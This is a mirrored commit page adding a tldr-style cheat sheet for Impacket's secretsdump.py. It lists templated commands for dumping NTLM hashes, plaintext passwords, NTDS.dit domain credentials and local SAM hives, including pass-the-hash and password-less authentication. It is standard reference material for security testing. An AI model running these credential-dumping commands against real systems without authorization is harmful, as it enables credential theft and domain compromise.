mirror of https://github.com/tldr-pages/tldr.git synced 2025-04-22 01:22:09 +02:00

secretsdump.py, impacket-secretsdump : add page (#15812 )

* secretsdump.py: add page

* impacket-secretsdump: add Alias

* Update secretsdump.py.md

Update examples

* Update pages/common/secretsdump.py.md

Co-authored-by: Sebastiaan Speck <12570668+sebastiaanspeck@users.noreply.github.com>

---------

Co-authored-by: Sebastiaan Speck <12570668+sebastiaanspeck@users.noreply.github.com>

2025-03-01 10:42:05 +01:00

959 B

Raw Blame History

secretsdump.py

Dump NTLM hashes, plaintext passwords, and domain credentials from remote Windows systems. Part of the Impacket suite. More information: https://github.com/fortra/impacket.

Dump credentials from a Windows machine using a username and password:

secretsdump.py {{domain}}/{{username}}:{{password}}@{{target}}

Dump hashes from a machine using pass-the-hash authentication:

secretsdump.py -hashes {{LM_Hash}}:{{NT_Hash}} {{domain}}/{{username}}@{{target}}

Dump credentials from Active Directory’s NTDS.dit file:

secretsdump.py -just-dc {{domain}}/{{username}}:{{password}}@{{target}}

Extract credentials from a local SAM database using registry hives:

secretsdump.py -sam {{path/to/SAM}} -system {{path/to/SYSTEM}}

Dump hashes from a machine without providing a password (if a valid authentication session exists, e.g. via Kerberos or NTLM SSO):

secretsdump.py -no-pass {{domain}}/{{username}}@{{target}}

959 B Raw Blame History

secretsdump.py

959 B

Raw Blame History